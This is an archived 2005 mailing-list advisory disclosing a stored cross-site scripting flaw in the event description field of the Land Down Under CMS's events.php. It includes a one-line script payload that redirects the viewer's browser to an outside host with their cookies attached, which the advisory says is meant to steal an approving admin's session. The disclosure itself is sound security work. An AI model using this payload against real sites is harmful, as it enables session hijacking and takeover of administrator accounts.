|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Land Down Under 'events.php' Cross Site Scripting Vulnerability
conor.e.buckley
gmail.com
Date: Mon Sep 05 2005 - 15:11:45 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
In Land Down Under (LDU http://www.neocrome.net/), the target script "events.php?m=add" is vulnerable to XSS.
When submitting an event, the "Description" field is vulnerable to HTML injection. Any user logged in can submit an event but an admin must approve of the event before being publicly viewed. Using javascript, an admin's cookie can be stolen.
Exploit:
Description:
<script>document.location="http://example.com/script?cookie="+escape(document.cookie)</script>
LDU 801 and earlier are vulnerable.
--------------------------------
conor.e.buckleygmail.com
http://quixote.at.preempted.net
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]